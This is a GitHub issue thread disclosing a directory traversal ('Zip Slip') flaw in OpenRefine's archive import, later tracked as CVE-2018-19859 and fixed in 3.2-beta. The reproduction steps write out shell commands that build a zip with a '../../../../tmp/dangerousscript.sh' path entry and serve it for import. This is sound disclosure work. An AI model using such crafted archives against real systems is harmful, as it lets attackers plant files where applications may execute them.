Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Directory traversal (unsafe unzip) vulnerability #1840

Closed
itsacoderepo opened this issue Nov 20, 2018 · 8 comments

Comments

Projects
None yet
7 participants
@itsacoderepo
Copy link

commented Nov 20, 2018

Describe the bug

It is possible to create files outside the temporary folder by importing a zip file containing files with relative paths. This can be used to create scripts and configurations at locations where they can be picked up by applications, other scripts or executed during start up.

Additional information https://snyk.io/research/zip-slip-vulnerability

To Reproduce
Video (zipped video because GH extension restrictions) openrefine_zip_dir_traversal.zip

Steps to reproduce the behavior:

Create payload and start server on Linux

cd /tmp/
touch "dangerousscript.sh"
zip legitdata.zip "../../../../../../../../tmp/dangerousscript.sh"
python -m http.server 8000

Steps on openrefine

  1. Start openrefine ($ ./refine)
  2. Click on "Create Project"
  3. Click on "Web Addresses (URLs)" (also possible through uploading a local zip file)
  4. Insert a malicious URL, eg. http://lookslegit.com/cooldata/legitdata.zip
  5. If the file does not exist, the malicious file is silently created
    If the file does exist, openrefine shows a stack trace (see below) on terminal

Current Results

No error nor warning.

Expected behavior

Warn the user about dangerous content in the zip and prevent the creation of the file.

Video

The video is inside a zip file because github filexetension restrictions.

Desktop (please complete the following information):

  • OS: Linux (Arch, Debian)
  • Browser Version: Not important
  • JRE or JDK Version:

openjdk version "1.8.0_171"
OpenJDK Runtime Environment (build 1.8.0_171-8u171-b11-2-b11)
OpenJDK 64-Bit Server VM (build 25.171-b11, mixed mode)

And

openjdk version "1.8.0_192"
OpenJDK Runtime Environment (build 1.8.0_192-b26)
OpenJDK 64-Bit Server VM (build 25.192-b26, mixed mode)

OpenRefine (please complete the following information):

  • Version 3.0 [TRUNK] and 3.1-beta [TRUNK] (maybe also previous versions)

Stack trace

java.io.FileNotFoundException: /tmp/Jetty_127_0_0_1_3333_webapp____4ulpc9/import/2/raw-data/-2../../../../../../../../tmp/dangerousscript.sh (No such file or directory)
	at java.io.FileOutputStream.open0(Native Method)
	at java.io.FileOutputStream.open(FileOutputStream.java:270)
	at java.io.FileOutputStream.<init>(FileOutputStream.java:213)
	at java.io.FileOutputStream.<init>(FileOutputStream.java:162)
	at com.google.refine.importing.ImportingUtilities.saveStreamToFile(ImportingUtilities.java:591)
	at com.google.refine.importing.ImportingUtilities.explodeArchive(ImportingUtilities.java:749)
	at com.google.refine.importing.ImportingUtilities.postProcessRetrievedFile(ImportingUtilities.java:619)
	at com.google.refine.importing.ImportingUtilities.saveStream(ImportingUtilities.java:512)
	at com.google.refine.importing.ImportingUtilities.download(ImportingUtilities.java:441)
	at com.google.refine.importing.ImportingUtilities.download(ImportingUtilities.java:372)
	at com.google.refine.importing.ImportingUtilities.retrieveContentFromPostRequest(ImportingUtilities.java:285)
	at com.google.refine.importing.ImportingUtilities.loadDataAndPrepareJob(ImportingUtilities.java:141)
	at com.google.refine.importing.DefaultImportingController.doLoadRawData(DefaultImportingController.java:119)
	at com.google.refine.importing.DefaultImportingController.doPost(DefaultImportingController.java:87)
	at com.google.refine.commands.importing.ImportingControllerCommand.doPost(ImportingControllerCommand.java:62)
	at com.google.refine.RefineServlet.service(RefineServlet.java:178)
	at javax.servlet.http.HttpServlet.service(HttpServlet.java:820)
	at org.mortbay.jetty.servlet.ServletHolder.handle(ServletHolder.java:511)
	at org.mortbay.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1166)
	at org.mortbay.servlet.UserAgentFilter.doFilter(UserAgentFilter.java:81)
	at org.mortbay.servlet.GzipFilter.doFilter(GzipFilter.java:132)
	at org.mortbay.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1157)
	at org.mortbay.jetty.servlet.ServletHandler.handle(ServletHandler.java:388)
	at org.mortbay.jetty.security.SecurityHandler.handle(SecurityHandler.java:216)
	at org.mortbay.jetty.servlet.SessionHandler.handle(SessionHandler.java:182)
	at org.mortbay.jetty.handler.ContextHandler.handle(ContextHandler.java:765)
	at org.mortbay.jetty.webapp.WebAppContext.handle(WebAppContext.java:418)
	at org.mortbay.jetty.handler.HandlerWrapper.handle(HandlerWrapper.java:152)
	at org.mortbay.jetty.Server.handle(Server.java:326)
	at org.mortbay.jetty.HttpConnection.handleRequest(HttpConnection.java:542)
	at org.mortbay.jetty.HttpConnection$RequestHandler.content(HttpConnection.java:938)
	at org.mortbay.jetty.HttpParser.parseNext(HttpParser.java:755)
	at org.mortbay.jetty.HttpParser.parseAvailable(HttpParser.java:218)
	at org.mortbay.jetty.HttpConnection.handle(HttpConnection.java:404)
	at org.mortbay.jetty.bio.SocketConnector$Connection.run(SocketConnector.java:228)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
@wetneb

This comment has been minimized.

Copy link
Member

commented Nov 20, 2018

Thanks for the report!

@itsacoderepo itsacoderepo changed the title Directory traversal ("Zip Slip") vulnerability Directory traversal (unsafe unzip) vulnerability Nov 22, 2018

@jackyq2015 jackyq2015 added the patch label Nov 27, 2018

@jackyq2015 jackyq2015 added this to the 3.5 milestone Nov 27, 2018

@thadguidry

This comment has been minimized.

Copy link
Member

commented Nov 28, 2018

@itsacoderepo Do you recommend a fix such as what Sonarqube did ? SonarSource/sonarqube@08438a2#diff-6d8def68a00bf88a105528765f02fb95

or another method / library ?

@magdmartin

This comment has been minimized.

Copy link
Member

commented Dec 6, 2018

It is also reported under CVE-2018-19859

@wetneb wetneb self-assigned this Dec 6, 2018

wetneb added a commit that referenced this issue Dec 9, 2018

@wetneb wetneb modified the milestones: 3.5, 3.2 Feb 7, 2019

@mdbaehre

This comment has been minimized.

Copy link

commented Mar 1, 2019

Is the CVE-2018-19859 vulnerability fixed in the 3.2-beta? The history above and the bug fix summary for 3.2-beta seems to indicate it has - but you indicate above that you've allocated some work to 3.5. As a result the CVE record (https://nvd.nist.gov/vuln/detail/CVE-2018-19859) indicates that it won't be fixed until 3.5. My work won't let me use the software until the NIST vulnerabilities are fixed
thanks

@wetneb

This comment has been minimized.

Copy link
Member

commented Mar 2, 2019

@mdbaehre Yes this was fixed in 3.2-beta.

@ostephens

This comment has been minimized.

Copy link
Member

commented Mar 4, 2019

I've submitted a request to the CVE database for CVE-2018-19859 to reflect this earlier fix to the vulnerability

@ostephens

This comment has been minimized.

Copy link
Member

commented Mar 28, 2019

CVE database now updated to indicate that this has been fixed in 3.2-beta http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19859

@wetneb

This comment has been minimized.

Copy link
Member

commented Mar 28, 2019

Fantastic, thanks a lot Owen!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.